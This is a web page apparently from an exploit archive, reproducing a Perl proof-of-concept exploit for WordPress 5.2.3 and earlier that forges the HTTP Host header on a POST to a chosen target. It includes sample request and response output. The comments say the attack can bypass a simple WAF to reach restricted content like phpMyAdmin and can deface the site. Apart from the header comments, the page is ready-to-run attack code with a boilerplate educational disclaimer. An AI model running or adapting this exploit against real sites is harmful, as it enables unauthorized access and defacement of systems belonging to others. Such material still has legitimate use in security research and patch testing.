扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 |
#!/usr/bin/perl -w # #WordPress <= 5.2.3 Remote Cross Site Host Modification Proof Of Concept Demo Exploit # #Copyright 2019 (c) Todor Donev <todor.donev at gmail.com> # #Type: Remote #Risk: High # #Solution: #Set security headers to web server and no-cache for Cache-Control # #Simple Attack Scenarios: # # oThis attack can bypass Simple WAF to access restricted content on the web server, #something like phpMyAdmin; # # oThis attack can deface the vulnerable WordPress website with content from the default vhost; # #Disclaimer: #This or previous programs are for Educational purpose ONLY. Do not use it without permission. #The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages #caused by direct or indirect use of theinformation or functionality provided by these programs. #The author or any Internet providerbears NO responsibility for content or misuse of these programs #or any derivatives thereof. By using these programs you accept the factthat any damage (dataloss, #system crash, system compromise, etc.) caused by the useof these programs are not Todor Donev's #responsibility. # #Use them at your own risk! # # # WordPress <= 5.2.3 Remote Cross Site Host Modification Proof Of Concept Demo Exploit # # ==================================================================================== # # Author: Todor Donev 2019 (c) <todor.donev at gmail.com> # # >Host => default-vhost.com # # >User-Agent => Mozilla/5.0 (compatible; Konqueror/3.5; NetBSD 4.0_RC3; X11) KHTML/3.5.7 (like Gecko) # # >Content-Type => application/x-www-form-urlencoded # # <Connection => close # # <Date => Fri, 06 Sep 2019 11:39:43 GMT # # <Location => https://default-vhost.com/ # # <Server => nginx # # <Content-Type => text/html; charset=UTF-8 # # <Client-Date => Fri, 06 Sep 2019 11:39:43 GMT # # <Client-Peer => 13.37.13.37:443 # # <Client-Response-Num => 1 # # <Client-SSL-Cert-Issuer => /C=US/O=Let's Encrypt/CN=Let's Encrypt Authority X3 # # <Client-SSL-Cert-Subject => /CN=default-vhost.com # # <Client-SSL-Cipher => ECDHE-RSA-AES256-GCM-SHA384 # # <Client-SSL-Socket-Class => IO::Socket::SSL # # <Client-SSL-Warning => Peer certificate not verified # # <Client-Transfer-Encoding => chunked # # <Strict-Transport-Security => max-age=31536000; # # <X-Powered-By => PHP/7.3.9 # # <X-Redirect-By => WordPress # # ==================================================================================== # # # use strict; use v5.10; use HTTP::Request; use LWP::UserAgent; use WWW::UserAgent::Random; my $host = shift || ''; my $attacker = shift || 'default-vhost.com'; say "# WordPress <= 5.2.3 Remote Cross Site Host Modification Proof Of Concept Demo Exploit # ==================================================================================== # Author: Todor Donev 2019 (c) <todor.donev at gmail.com>"; if ($host !~ m/^http/){ say"# e.g. perl $0 https://target:port/ default-vhost.com"; exit; } my $user_agent = rand_ua("browsers"); my $browser= LWP::UserAgent->new( protocols_allowed => ['http', 'https'], ssl_opts => { verify_hostname => 0 } ); $browser->timeout(10); $browser->agent($user_agent); my $request = HTTP::Request->new (POST => $host,[Content_Type => "application/x-www-form-urlencoded"], " "); $request->header("Host" => $attacker); my $response = $browser->request($request); say "# 401 Unauthorized!\n" and exit if ($response->code eq '401'); say "# >$_ => ", $request->header($_) for$request->header_field_names; say "# <$_ => ", $response->header($_) for$response->header_field_names; say "# ===================================================================================="; |
体验盒子
